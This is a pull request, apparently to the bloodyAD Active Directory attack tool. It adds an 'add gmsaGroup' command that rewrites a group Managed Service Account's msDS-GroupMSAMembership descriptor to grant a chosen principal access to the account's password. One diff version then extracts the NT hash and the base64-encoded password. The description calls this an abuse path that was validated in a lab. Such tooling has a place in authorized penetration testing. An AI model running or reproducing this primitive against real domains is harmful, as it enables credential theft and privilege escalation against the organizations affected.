### PR TITLE
Add `add gmsaGroup` primitive for `msDS-GroupMSAMembership`

### DIFF
--- a/bloodyAD/cli_modules/add.py
+++ b/bloodyAD/cli_modules/add.py
@@ -9,6 +9,7 @@ from bloodyAD.exceptions import BloodyError
 from bloodyAD.cli_modules import set as bloodySet
 import badldap
 from badldap.commons.keycredential import KeyCredential
+from badldap.wintypes.managedpassword import MSDS_MANAGEDPASSWORD_BLOB
 from kerbad.common import factory
 from kerbad.common.spn import KerberosSPN
 from kerbad.common.kirbi import Kirbi
@@ -490,6 +491,17 @@ async def gmsaGroup(conn: ConnectionHandler, gmsa_account: str, new_member: str)
     )
 
     LOG.info(f"{new_member} can now retrieve the password of {gmsa_account}")
+    async for entry in ldap.bloodysearch(
+        gmsa_account, attr=["msDS-ManagedPassword"], raw=True
+    ):
+        gmsa_blob = MSDS_MANAGEDPASSWORD_BLOB.from_bytes(entry["msDS-ManagedPassword"][0])
+        yield {
+            "distinguishedName": entry["distinguishedName"],
+            "msDS-ManagedPassword": {
+                "NT": gmsa_blob.nt_hash,
+                "B64ENCODED": base64.b64encode(gmsa_blob.CurrentPassword).decode(),
+            },
+        }
 
 
 async def rbcd(conn: ConnectionHandler, target: str, service: str):

--- a/bloodyAD/cli_modules/add.py
+++ b/bloodyAD/cli_modules/add.py
@@ -458,6 +458,40 @@ async def groupMember(conn: ConnectionHandler, group: str, member: str):
     LOG.info(f"{member} added to {group}")
 
 
+async def gmsaGroup(conn: ConnectionHandler, gmsa_account: str, new_member: str):
+    """
+    Add a new member (user, group, computer) to msDS-GroupMSAMembership of a gMSA so it can retrieve its password
+
+    :param gmsa_account: sAMAccountName, DN or SID of the gMSA
+    :param new_member: sAMAccountName, DN or SID of the new member
+    """
+    ldap = await conn.getLdap()
+    control_flag = 0
+    new_sd, _ = await utils.getSD(
+        conn, gmsa_account, "msDS-GroupMSAMembership", control_flag
+    )
+    if "s-1-" in new_member.lower():
+        new_member_sid = new_member
+    else:
+        entry = None
+        async for e in ldap.bloodysearch(new_member, attr=["objectSid"]):
+            entry = e
+            break
+        new_member_sid = entry["objectSid"]
+    access_mask = (
+        accesscontrol.ACCESS_FLAGS["ADS_RIGHT_DS_READ_PROP"]
+        | accesscontrol.ACCESS_FLAGS["ADS_RIGHT_DS_CONTROL_ACCESS"]
+    )
+    utils.addRight(new_sd, new_member_sid, access_mask)
+
+    await ldap.bloodymodify(
+        gmsa_account,
+        {"msDS-GroupMSAMembership": [(Change.REPLACE.value, new_sd.getData())]},
+    )
+
+    LOG.info(f"{new_member} can now retrieve the password of {gmsa_account}")
+
+
 async def rbcd(conn: ConnectionHandler, target: str, service: str):
     """
     Add Resource Based Constraint Delegation for service on target, used to impersonate a user on target with service (Requires "Write" permission on target's msDS-AllowedToActOnBehalfOfOtherIdentity and Windows Server >= 2012)

--- a/bloodyAD/cli_modules/add.py
+++ b/bloodyAD/cli_modules/add.py
@@ -9,7 +9,6 @@ from bloodyAD.exceptions import BloodyError
 from bloodyAD.cli_modules import set as bloodySet
 import badldap
 from badldap.commons.keycredential import KeyCredential
-from badldap.wintypes.managedpassword import MSDS_MANAGEDPASSWORD_BLOB
 from kerbad.common import factory
 from kerbad.common.spn import KerberosSPN
 from kerbad.common.kirbi import Kirbi
@@ -459,49 +458,39 @@ async def groupMember(conn: ConnectionHandler, group: str, member: str):
     LOG.info(f"{member} added to {group}")
 
 
-async def gmsaGroup(conn: ConnectionHandler, gmsa_account: str, new_member: str):
+async def gmsaGroup(conn: ConnectionHandler, gmsa: str, member: str):
     """
     Add a new member (user, group, computer) to msDS-GroupMSAMembership of a gMSA so it can retrieve its password
 
-    :param gmsa_account: sAMAccountName, DN or SID of the gMSA
-    :param new_member: sAMAccountName, DN or SID of the new member
+    :param gmsa: sAMAccountName, DN or SID of the gMSA
+    :param member: sAMAccountName, DN or SID of the new member
     """
     ldap = await conn.getLdap()
-    control_flag = 0
     new_sd, _ = await utils.getSD(
-        conn, gmsa_account, "msDS-GroupMSAMembership", control_flag
+        conn, gmsa, "msDS-GroupMSAMembership", 0
     )
-    if "s-1-" in new_member.lower():
-        new_member_sid = new_member
+    if "s-1-" in member.lower():
+        member_sid = member
     else:
-        entry = None
-        async for e in ldap.bloodysearch(new_member, attr=["objectSid"]):
-            entry = e
+        async for e in ldap.bloodysearch(member, attr=["objectSid"]):
+            member_sid = e["objectSid"]
             break
-        new_member_sid = entry["objectSid"]
     access_mask = (
         accesscontrol.ACCESS_FLAGS["ADS_RIGHT_DS_READ_PROP"]
         | accesscontrol.ACCESS_FLAGS["ADS_RIGHT_DS_CONTROL_ACCESS"]
     )
-    utils.addRight(new_sd, new_member_sid, access_mask)
+    utils.addRight(new_sd, member_sid, access_mask)
 
     await ldap.bloodymodify(
-        gmsa_account,
+        gmsa,
         {"msDS-GroupMSAMembership": [(Change.REPLACE.value, new_sd.getData())]},
     )
 
-    LOG.info(f"{new_member} can now retrieve the password of {gmsa_account}")
+    LOG.info(f"{member} can now retrieve the password of {gmsa}")
     async for entry in ldap.bloodysearch(
-        gmsa_account, attr=["msDS-ManagedPassword"], raw=True
+        gmsa, attr=["msDS-ManagedPassword"]
     ):
-        gmsa_blob = MSDS_MANAGEDPASSWORD_BLOB.from_bytes(entry["msDS-ManagedPassword"][0])
-        yield {
-            "distinguishedName": entry["distinguishedName"],
-            "msDS-ManagedPassword": {
-                "NT": gmsa_blob.nt_hash,
-                "B64ENCODED": base64.b64encode(gmsa_blob.CurrentPassword).decode(),
-            },
-        }
+        yield entry
 
 
 async def rbcd(conn: ConnectionHandler, target: str, service: str):

--- a/tests/unit_test.py
+++ b/tests/unit_test.py
@@ -96,6 +96,10 @@ class UnitTests(unittest.TestCase):
             ["--host", "test.local", "add", "shadowcredentials", "--help"],
             ["--host", "test.local", "add", "SHADOWCREDENTIALS", "--help"],
             ["--host", "test.local", "add", "ShadowCredentials", "--help"],
+            # Test gmsaGroup variations
+            ["--host", "test.local", "add", "gmsagroup", "--help"],
+            ["--host", "test.local", "add", "GMSAGROUP", "--help"],
+            ["--host", "test.local", "add", "gmsaGroup", "--help"],
             # Test get module
             ["--host", "test.local", "get", "object", "--help"],
             ["--host", "test.local", "get", "OBJECT", "--help"],


### PR DESCRIPTION
This adds a new built-in primitive:

- `add gmsaGroup <gmsa_account> <new_member>`

It follows the same CLI shape as `add groupMember` and implements the
gMSA password retrieval abuse path by updating the target gMSA's
`msDS-GroupMSAMembership` security descriptor.

Implementation details:
- read the current `msDS-GroupMSAMembership` SD
- resolve `<new_member>` to SID when needed
- add `ADS_RIGHT_DS_READ_PROP | ADS_RIGHT_DS_CONTROL_ACCESS`
- write the updated SD back

Tests:
- added case-insensitive CLI coverage for `add gmsaGroup`
- ran `python -m unittest tests.unit_test -v`

Manual validation:
- exercised the new command against a lab gMSA
- confirmed the ACE was added to `msDS-GroupMSAMembership`
- confirmed `msDS-ManagedPassword` became readable afterward
<img width="909" height="584" alt="bloodyAD" src="https://github.com/user-attachments/assets/3658655a-a96a-41e0-9114-470e03f77212" />

